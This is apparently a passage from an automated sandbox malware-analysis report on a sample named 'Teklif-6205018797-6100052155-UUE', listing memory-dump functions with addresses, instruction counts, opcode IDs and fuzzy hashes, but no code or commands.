                                                          Function 0593EBB0 Relevance: .2, Instructions: 222COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2da6b5cb3cff24380616c4ee2629896ead2aa80582e1d0c824b517ffb749c29c
                                                          • Instruction ID: 5f2b2dff9f27a95b3192221d6da7b0acf57b11e755bfa6b400f23122e008b322
                                                          • Opcode Fuzzy Hash: 2da6b5cb3cff24380616c4ee2629896ead2aa80582e1d0c824b517ffb749c29c
                                                          • Instruction Fuzzy Hash: 4E812B34710614DFCB14DF68D899A6DBBBABF89710F1485A9E506DB3A1CB30ED41CB90
                                                          Function 05930EC8 Relevance: .2, Instructions: 217COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9366c8d82a6ea38fcb49804db78df610935abf0942988b6290c138dd4bfd941
                                                          • Instruction ID: 88d9c5e66a7a225768e19e4e79c75e8d65d1236f978671f97fadaacd044b7b9d
                                                          • Opcode Fuzzy Hash: c9366c8d82a6ea38fcb49804db78df610935abf0942988b6290c138dd4bfd941
                                                          • Instruction Fuzzy Hash: 31813735A01208DFDB05DFA5D959AADBBF6FF88311F148069E902AB390DB39DD42CB50
                                                          Function 05961746 Relevance: .2, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b38976c07f95ee4f2d6e6497773f023dafb1104e21fb2678093cca8592b8c36
                                                          • Instruction ID: 614764b27917abd8703fcdf3eecebb75c0774cb66c8de67ff5246a26c06a927f
                                                          • Opcode Fuzzy Hash: 5b38976c07f95ee4f2d6e6497773f023dafb1104e21fb2678093cca8592b8c36
                                                          • Instruction Fuzzy Hash: 89A11574E01218CFDB54DFA8D544BADBBF2FB4A304F2494A9D40AAB255CB345E89CF11
                                                          Function 059671A8 Relevance: .2, Instructions: 214COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25d5dfc353c144e4ac3341eab88c9a48dd770ce83b17674a0ede211e7ae58425
                                                          • Instruction ID: 62fa34d37b42368e3391574ce445e164ad0312b786a7d5c7a789d979ccff4ca1
                                                          • Opcode Fuzzy Hash: 25d5dfc353c144e4ac3341eab88c9a48dd770ce83b17674a0ede211e7ae58425
                                                          • Instruction Fuzzy Hash: 3DA1E270D05218CFDB64DFA8D884B9DBBF6FB49308F2484AAE409A7354DB745989CF50
                                                          Function 059368B0 Relevance: .2, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00556f786a8c6bcffec05b0537f996eec9dfc40fb77c4914b9971279f6583e9d
                                                          • Instruction ID: 726e6be527d2d1841173c8182a919ead276a9d83a92dff6d62583d7a235f608e
                                                          • Opcode Fuzzy Hash: 00556f786a8c6bcffec05b0537f996eec9dfc40fb77c4914b9971279f6583e9d
                                                          • Instruction Fuzzy Hash: EC810575A00218DFCB14DF68C58499EBBFAFF88310B1585A9E816DB360DB31ED42CB90
                                                          Function 059617C6 Relevance: .2, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9369e7fbda35e67311509a5e09f7a51cca71264115992945a6a472fb4d5fb308
                                                          • Instruction ID: ed68c90564fd3d59f103cc38335dab0e4b1d275006ba808fb97bd250fe7ce545
                                                          • Opcode Fuzzy Hash: 9369e7fbda35e67311509a5e09f7a51cca71264115992945a6a472fb4d5fb308
                                                          • Instruction Fuzzy Hash: B781F274E01258CFDB54DFA8C544BADBBF2FB49305F2494AAD00AAB255CB345E89CF12
                                                          Function 05855EF3 Relevance: .2, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28081405351d9a2a6971adf6f5bdf5290b8f7bf462b0341271de6e9798079a0d
                                                          • Instruction ID: ed5253ff82838b0e43d704a81e98763571f82dae4002474c50c7c698889c332c
                                                          • Opcode Fuzzy Hash: 28081405351d9a2a6971adf6f5bdf5290b8f7bf462b0341271de6e9798079a0d
                                                          • Instruction Fuzzy Hash: F081D370D05219CFEB64CF69D844BADBBF2BB49328F6480A9D809E7251DBB49D85CF00
                                                          Function 05855BC5 Relevance: .2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12beda41e44e23160419bd8d9f92c3ac99eb4aba9d2bfac6f604e510cc8334ee
                                                          • Instruction ID: 5e421e4bdd33881f08b875f42f974fcd6ea78d7db769377d668c54206da8fd1e
                                                          • Opcode Fuzzy Hash: 12beda41e44e23160419bd8d9f92c3ac99eb4aba9d2bfac6f604e510cc8334ee
                                                          • Instruction Fuzzy Hash: 2181E370D05218CFEB64CF69D884BADBBF2BB49318F6481A9D809E7251DBB49D84CF01
                                                          Function 05855C9F Relevance: .2, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56cf42300747fdbbcc5d81f56a237d189b32a739ce664c99679d0d3499a96371
                                                          • Instruction ID: 27ffb8a817f45196d411f9500775f3a5e3d3176ad0f28c7de592d65e6fa9ac64
                                                          • Opcode Fuzzy Hash: 56cf42300747fdbbcc5d81f56a237d189b32a739ce664c99679d0d3499a96371
                                                          • Instruction Fuzzy Hash: 6F81D570D05218CFEB64CF6AD944BADBBF2BB49318F6490A9D809E7251DBB49D84CF04
                                                          Function 05855B95 Relevance: .2, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c4c8bbad38108f26d96dda9fda3cd74fe6698c6bcff5dcbbcccb4bfcc784dd5
                                                          • Instruction ID: 81023e678aed0bc5e1f97d0d06667947884bbe8067c1735315ff7cc90953af89
                                                          • Opcode Fuzzy Hash: 6c4c8bbad38108f26d96dda9fda3cd74fe6698c6bcff5dcbbcccb4bfcc784dd5
                                                          • Instruction Fuzzy Hash: 1B81D470D05218CFEB64CF69D944BADBBF2BB49324F6490A9D809E7251DBB49D84CF04
                                                          Function 05855CD0 Relevance: .2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99cfa79213fc5e68d48fac2ab1e60fdd2b890b69ab87802bbb6b01f3f763e1a5
                                                          • Instruction ID: 65b9a50c1df43b8c463b1f4754860c17437aaea4ed4cf5671895958ddac464d7
                                                          • Opcode Fuzzy Hash: 99cfa79213fc5e68d48fac2ab1e60fdd2b890b69ab87802bbb6b01f3f763e1a5
                                                          • Instruction Fuzzy Hash: 6071E670D05218CFEB64CF65D944BADBBF2BB49314F6491A9D809E7251DBB49D84CF00
                                                          Function 0596A20F Relevance: .2, Instructions: 167COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 33b6e46ba2286d8e56645323859aa6809d9c46222d8cf5371094aceb8103e006
                                                          • Instruction ID: cb17a5aba1aa583be6c6e6737ec4a04e7bcffb5a797ad94ee99f217391df8369
                                                          • Opcode Fuzzy Hash: 33b6e46ba2286d8e56645323859aa6809d9c46222d8cf5371094aceb8103e006
                                                          • Instruction Fuzzy Hash: 3171CE74E45218CFDB54DF69D984BADBBF2FB8A300F6091A9D409AB255DB305E89CF00
                                                          Function 05855B67 Relevance: .2, Instructions: 167COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9c80ecedb26e839e54412d8301aa8956dc1b6ac863d92082fb3639f91d7c060
                                                          • Instruction ID: 5f91bd66f4d82a0eb88f3ede11ff5bb15c12bbdf1ffc84f8fe07f7a4b1817f63
                                                          • Opcode Fuzzy Hash: b9c80ecedb26e839e54412d8301aa8956dc1b6ac863d92082fb3639f91d7c060
                                                          • Instruction Fuzzy Hash: 6771E470D05218CFEB64CF69D944BADBBF2BB49324F6490A9D809E7251EBB49D84CF00
                                                          Function 0596A24D Relevance: .2, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4afec32200581e3a063219a3d844282523b311c6a09f43177d9f8174f52be93e
                                                          • Instruction ID: fc12f00ad12338d3a2750ce6ba4967d0bdade0edf7af157f17b2e0d997903ad5
                                                          • Opcode Fuzzy Hash: 4afec32200581e3a063219a3d844282523b311c6a09f43177d9f8174f52be93e
                                                          • Instruction Fuzzy Hash: C171DF74E45218CFDB64DF69D944BADBBF2FB8A300F2091A9D409A7255DB305E85CF00
                                                          Function 05968549 Relevance: .2, Instructions: 164COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5080f231b94f5e0515d86c7b9b1f967992310d3bc662e873ec5831b9075a0663
                                                          • Instruction ID: d355c5a21a6fda60938ba7bcd568e280afd354682a31546286cfa829c987d65f
                                                          • Opcode Fuzzy Hash: 5080f231b94f5e0515d86c7b9b1f967992310d3bc662e873ec5831b9075a0663
                                                          • Instruction Fuzzy Hash: B961E4B0D05208CFDB14DFA9D484BADBBF6FF49304F24906AD009AB265DB749989CF05
                                                          Function 0593EBA0 Relevance: .2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3642c99593de9e4c53dd3fa58cb70b394c2b7dd1c15bbbccb2fb2731482c3f00
                                                          • Instruction ID: 462d1260a251b1e3d5de95ada89446cf91f18fe68147c86e3e831923fb7261ad
                                                          • Opcode Fuzzy Hash: 3642c99593de9e4c53dd3fa58cb70b394c2b7dd1c15bbbccb2fb2731482c3f00
                                                          • Instruction Fuzzy Hash: F7612A35710614DFCB04DF68C899AADB7BAFF89710F548169E816AB3A5CB30EC41CB90
                                                          Function 05969F68 Relevance: .2, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1386b0efca43bc0c31653770050f7f412f58caa36404c9072f34fdd26d1088a
                                                          • Instruction ID: fa211948dc54d8ffdd1ec1386ab4da29dc9343b184f2a746990054cc54b9ac5c
                                                          • Opcode Fuzzy Hash: a1386b0efca43bc0c31653770050f7f412f58caa36404c9072f34fdd26d1088a
                                                          • Instruction Fuzzy Hash: 1771FF74E05218CFDB64DF69D944BADBBF2FB8A304F6091A9D409AB254DB705E88CF01
                                                          Function 05969F78 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b34c21c905788b0ef64d9177662e835c865729e82f6eae21cbe4953e329ce118
                                                          • Instruction ID: e2c907f39f746761d603af48f88747ffefa264cd828e9a6ccb6368eee8af6f9e
                                                          • Opcode Fuzzy Hash: b34c21c905788b0ef64d9177662e835c865729e82f6eae21cbe4953e329ce118
                                                          • Instruction Fuzzy Hash: 1E71E074E05218CFDB54DF69DA44BAEBBF2FB8A300F5091A9D409AB255DB705E88CF01
                                                          Function 05C88DB8 Relevance: .2, Instructions: 157COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f61247b907f6ef81a73f410653f1e49543b43e06ee2d5c06081162b953e55e82
                                                          • Instruction ID: a9a9b675cc64d661e475170a7822b0a666d9b009d23f7b281f53f3df7085d38a
                                                          • Opcode Fuzzy Hash: f61247b907f6ef81a73f410653f1e49543b43e06ee2d5c06081162b953e55e82
                                                          • Instruction Fuzzy Hash: 1661C0B8E05228DFCB54EFA9D8446EDBBF2BF89304F90882AD419B7650D7745A45CF80
                                                          Function 0596A3FA Relevance: .1, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adc28ef536dbd6f499d6fa3d52605b4a530ddf4e3b238056a09bc841e974f951
                                                          • Instruction ID: 6556be277cf7ad1fe37b79092a16f94fd257ceff8408c969d8c1eed7b998e85f
                                                          • Opcode Fuzzy Hash: adc28ef536dbd6f499d6fa3d52605b4a530ddf4e3b238056a09bc841e974f951
                                                          • Instruction Fuzzy Hash: 6061F174A05218CFDB54DF28D984BAEBBF2FF4A304F6491A9D409AB255DB309E85CF01
                                                          Function 059398E8 Relevance: .1, Instructions: 143COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58d7047f7d9500480853f2c102a20b35523ca043c0e1c856f9c960d80ddc2fa7
                                                          • Instruction ID: bf31341cc7db8ee6c8ca0a2225e4b73a95b4b443a87435cb1521bf30d648bbb2
                                                          • Opcode Fuzzy Hash: 58d7047f7d9500480853f2c102a20b35523ca043c0e1c856f9c960d80ddc2fa7
                                                          • Instruction Fuzzy Hash: 18514B38B10609DFCB04EF64E499AAEBBB6FF88705F008519E5029B364DF749946CF81
                                                          Function 0596AAB8 Relevance: .1, Instructions: 142COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a771091d0bf6c968e134e2114d42d3a0709c371975c61eeed7e85c47055960cd
                                                          • Instruction ID: d5530558a18d0e1871c2660e9e508e00f4ed072a5eb63de3ff4448451a614d37
                                                          • Opcode Fuzzy Hash: a771091d0bf6c968e134e2114d42d3a0709c371975c61eeed7e85c47055960cd
                                                          • Instruction Fuzzy Hash: 2751F0B0E04218CFDB14DFA5D844BAEBBB6FB49300F10916AE419BB294DB784989CF51
                                                          Function 0596A1DF Relevance: .1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e75a58351156d6d02a29be60defec21701d3f20e2f8a1dde5e6d05ec98e7080
                                                          • Instruction ID: 117437a16b45ce54a435d53b4e47353fd855e75f540624937ff1625a650c5530
                                                          • Opcode Fuzzy Hash: 1e75a58351156d6d02a29be60defec21701d3f20e2f8a1dde5e6d05ec98e7080
                                                          • Instruction Fuzzy Hash: 6461F174E05218CFDB54DF28D944BAEBBF2FB4A304F6191AAD409AB255DB705E88CF01
                                                          Function 0596A288 Relevance: .1, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e3bbe40c2bcfdd56279671e28c71f718ac8fab3d313479ac2cdb1a0c5885448
                                                          • Instruction ID: 0fad1ed7eb0406b120309277bd4450816df2a12502f28669e73bc7648c8bd633
                                                          • Opcode Fuzzy Hash: 2e3bbe40c2bcfdd56279671e28c71f718ac8fab3d313479ac2cdb1a0c5885448
                                                          • Instruction Fuzzy Hash: 6A61CF74E01218CFDB60DF68D984BAEBBF2FB4A304F6191A9D409AB254DB705E84CF01
                                                          Function 0596A303 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66c114e429497050f762ed27a8e907b9cd0e6b889fb4765d1263add1acbdd485
                                                          • Instruction ID: 08682fe3d87ba5c1b0706090466085babeb120cead4d1bdb36ca5b958baf26e1
                                                          • Opcode Fuzzy Hash: 66c114e429497050f762ed27a8e907b9cd0e6b889fb4765d1263add1acbdd485
                                                          • Instruction Fuzzy Hash: 5051CF74E05218CFDB54EF68D944BADBBF2FB4A304F5191A9D409AB255DB705E84CF00
                                                          Function 058564F0 Relevance: .1, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a03a3a57cb09f5ac75eb266676f9a639bb0814787e77d1f1ae7eeab7d08ecac5
                                                          • Instruction ID: 6e2fdf3b510044ff44e9dbfe1e3116a9fd362654e92060ec531ab8fb3105065f
                                                          • Opcode Fuzzy Hash: a03a3a57cb09f5ac75eb266676f9a639bb0814787e77d1f1ae7eeab7d08ecac5
                                                          • Instruction Fuzzy Hash: 9A512874E00208DFCB18DFBAC454AADBBF2BF89314F64816AD809AB351DB319846CF41
                                                          Function 05961D90 Relevance: .1, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d2a708932ef7f22957a349b0c880a341702cb9df8e651d21944eb560b63c3bc
                                                          • Instruction ID: d20d4d42e31b568f5749a4aab0124590d07552f1bbbad42c22c34a409034faab
                                                          • Opcode Fuzzy Hash: 3d2a708932ef7f22957a349b0c880a341702cb9df8e651d21944eb560b63c3bc
                                                          • Instruction Fuzzy Hash: AA416674E05208CFCB04DFA8D454AEEBBF6EF89301F14846AE809B7350DB745A48DB61
                                                          Function 059659F0 Relevance: .1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ee1329d6c37d37d0d3baeda3b7eee2194a558600f88e7eee2f1d5ff8c2f06e7b
                                                          • Instruction ID: b07e69c1356516afc41ca5714b039c1df6265a6774493e80bee3819c9d11b0c1
                                                          • Opcode Fuzzy Hash: ee1329d6c37d37d0d3baeda3b7eee2194a558600f88e7eee2f1d5ff8c2f06e7b
                                                          • Instruction Fuzzy Hash: F651E174E042288FDB64DF6AC8A47DDBBF6FB8A300F5484EAD549A7254DB305A85CF40
                                                          Function 05856500 Relevance: .1, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d24aefe9603f3d94c9a804ba840f4d9937287fc086ede77491ded1784abc6213
                                                          • Instruction ID: 9bd3292dd4453f65b02a2691813544f8d568249d001e9f33f4fc2e2ded0c9673
                                                          • Opcode Fuzzy Hash: d24aefe9603f3d94c9a804ba840f4d9937287fc086ede77491ded1784abc6213
                                                          • Instruction Fuzzy Hash: 7A51C574E01208DFDB58DFBAD454A9DBBF2BF88314F60812AD80AAB350DB759945CF50
                                                          Function 058564A8 Relevance: .1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36b32b492255603904cc1d21d7749266a6e9ab51e361adf853535d86f389e923
                                                          • Instruction ID: 29ef9bc376c5635930eed6edbb9d815528c2df06149913ca47ba2fdb65fd23d8
                                                          • Opcode Fuzzy Hash: 36b32b492255603904cc1d21d7749266a6e9ab51e361adf853535d86f389e923
                                                          • Instruction Fuzzy Hash: 0E41F874E05208DFCB14DFB9D484AADBBF2BF49318F608169D809AB351DB719946CF41
                                                          Function 05961DA0 Relevance: .1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 68f6602695c46a2dab499f9ba376acb928cbfb45849baa00270d3b65de9e5dde
                                                          • Instruction ID: 87f3e841f8fcb5d5e6bb37d35f1239ff1f2db0b9ba63677d1e7a1736f92ab7eb
                                                          • Opcode Fuzzy Hash: 68f6602695c46a2dab499f9ba376acb928cbfb45849baa00270d3b65de9e5dde
                                                          • Instruction Fuzzy Hash: EB412574E05608CFCB04DFA9D454AEEBBF6EB89301F14846AE40AB7350DB749A48DF61
                                                          Function 0585D400 Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
